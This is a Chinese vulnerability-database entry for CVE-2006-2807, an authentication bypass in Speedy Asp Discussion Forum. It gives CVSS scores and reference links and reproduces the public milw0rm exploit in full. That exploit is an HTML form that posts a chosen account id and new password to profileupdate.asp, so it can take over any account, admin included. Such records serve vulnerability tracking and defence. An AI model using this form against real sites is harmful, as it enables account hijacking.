CVE-2006-2807
CVSS10.0
发布时间 :2006-06-05 13:02:00
修订时间 :2008-09-05 17:05:29
NMCOE    

[原文]ASPwebSoft Speedy Asp Discussion Forum allows remote attackers to change the password of any account via a modified account id and possibly arbitrary values of the name, email, country, password, and passwordre parameters to profileupdate.asp.


[CNNVD]Speedy Asp Discussion Forum 认证绕过漏洞(CNNVD-200606-092)

        ASPwebSoft Speedy Asp Discussion Forum允许远程攻击者通过修改账户id和可能修改任意传给profileupdate.asp的name、email、country、password和passwordre参数值来修改任意账户的密码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2807
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2807
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-092
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18170
(UNKNOWN)  BID  18170
http://www.securityfocus.com/archive/1/archive/1/435209/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060527 Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit
http://xforce.iss.net/xforce/xfdb/26811
(UNKNOWN)  XF  speedyaspforum-user-account-manipulation(26811)
http://securityreason.com/securityalert/1037
(UNKNOWN)  SREASON  1037

- 漏洞信息

Speedy Asp Discussion Forum 认证绕过漏洞
危急 访问验证错误
2006-06-05 00:00:00 2006-06-05 00:00:00
远程  
        ASPwebSoft Speedy Asp Discussion Forum允许远程攻击者通过修改账户id和可能修改任意传给profileupdate.asp的name、email、country、password和passwordre参数值来修改任意账户的密码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1849)

Speedy ASP Forum (profileupdate.asp) User Pass Change Exploit (EDBID:1849)
asp webapps
2006-05-29 Verified
0 ajann
N/A [点击下载]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>

<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User 
Name    
:   </b></font>
<input type="text" name="name" value="" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname 
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User 
Mail        
:  </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">   Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>

<font face="Verdana" size="2" color="#FF0000"><b>User 
Ýd            
:  </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">  Example: Ýd:1 
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country  :  
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: 
Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">      
:  </font></b>

<input type="text" name="password" value="Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">  
:  </font></b>

<input type="text" name="passwordre" value="Re Password" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action    : 
</b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20"> 
<font size="1" color="#C0C0C0" face="Arial"> Example: 
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>

<p>

<input type="submit" name="Submit" value="Change"> </p>

<br>

 </form>

</div></body></html>

# milw0rm.com [2006-05-29]
		

- 漏洞信息

26575
Speedy ASP Forum profileupdate.asp Unauthorized Password Modification
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-27 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站